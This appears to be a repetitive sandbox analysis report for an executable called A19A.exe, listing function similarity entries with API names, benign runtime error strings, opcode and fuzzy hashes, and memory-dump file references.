                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fadf73bc2e50944fefc00032c28de83109e10e790768011e6425aa985484faa2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E818377E0824385FB654E2D81903B836A0EB17B45F55E039DA09D7295EF2FE907B20B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6cf636c1d413b9b1a8fe847baa594964b2e94e970a9ab49fc3c7a486a408bf4b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 243958769c9eb6371140cc3a943f259a2304b704ae8de693cf88ca470b88caa6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cf636c1d413b9b1a8fe847baa594964b2e94e970a9ab49fc3c7a486a408bf4b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B61AD33A08B858AE7108F65D4843AD77A0FB55B88F045226EF4D97B94CF79E066C705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 329a08ca03cb08bd392f4494bd83b59453bc3382771345a12b424e896a504c3c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD51B27390864187EB308F15954836877A0FB66B84F046136EA4CC7BD5DFBDE462AB0A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 17abb61591e7db78077733eb5dee975cb9b4ed688d79c79ae4bedeb99ce11e50
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE31E33362868182E720DB20E4507EA7364FF857C4F806032E68D83A99DF7DD316DB45
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF6E1B336B9), ref: 00007FF6E1B33BF1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E1B37774,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B32654
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32620: MessageBoxW.USER32 ref: 00007FF6E1B32730
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8697f2f3ade5c0586eb1e92607e14f5102551f3780f4b3d0a35fa2d0840cd37b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C01AC23F1C78282FB219731E8193B53252AF5E7C4F802031D84DC6692EF9EE156B70A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e365f9b30df03f18385238fa5722fca72bc799989c9a48dcea0a3fe118199c6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c66435ae2830bca08ba2516acf0445a78769739c856007eae577d8380175029
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e365f9b30df03f18385238fa5722fca72bc799989c9a48dcea0a3fe118199c6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0D1CC33B18A858AE721CF65D5802AC37B1FB46798B009226CF5ED7B99EE39D017D305
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 449c95e39da4df2867b46b159374f8523b626a66730582a3c2930d58854de1c6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2114023E1814283F7509769E5483B97253EF9A780F44A030EA4883B8ECE7ED4D65109
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2acbbad10cfc9d58145ba1a6d9745f59869e949f3b79383a590cd47bec613948
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE117022B14F068AEB00CF70E8553B833A4FB1A798F041E31DA6D927A4DF79D1959381
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52680a59223a085ee97f839467cc497833a0271fa4472f3ef08586064223ff36
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0eb4e0734a0226699e4accc304d56f43002021f7921f87e97e3e4219e4eab988
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52680a59223a085ee97f839467cc497833a0271fa4472f3ef08586064223ff36
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08413B13A0C28242F7649B25D40137A7652EF82BA4F145235EF5C8BAD5FF3ED441D706
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E1B47ECE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B49E48: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6E1B51E72,?,?,?,00007FF6E1B51EAF,?,?,00000000,00007FF6E1B52375,?,?,?,00007FF6E1B522A7), ref: 00007FF6E1B49E5E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B49E48: GetLastError.KERNEL32(?,?,?,00007FF6E1B51E72,?,?,?,00007FF6E1B51EAF,?,?,00000000,00007FF6E1B52375,?,?,?,00007FF6E1B522A7), ref: 00007FF6E1B49E68
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6E1B3B135), ref: 00007FF6E1B47EEC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2553983749-3325057236
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 20e0fa1cddfcb9b50fa612d7809b1235543b267f8bf6d467ddf7fa8b8e985724
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 39b85895d8bcd63f53b4f9e6552c4bd7ec14047f70d825a68244de4c9e567f55
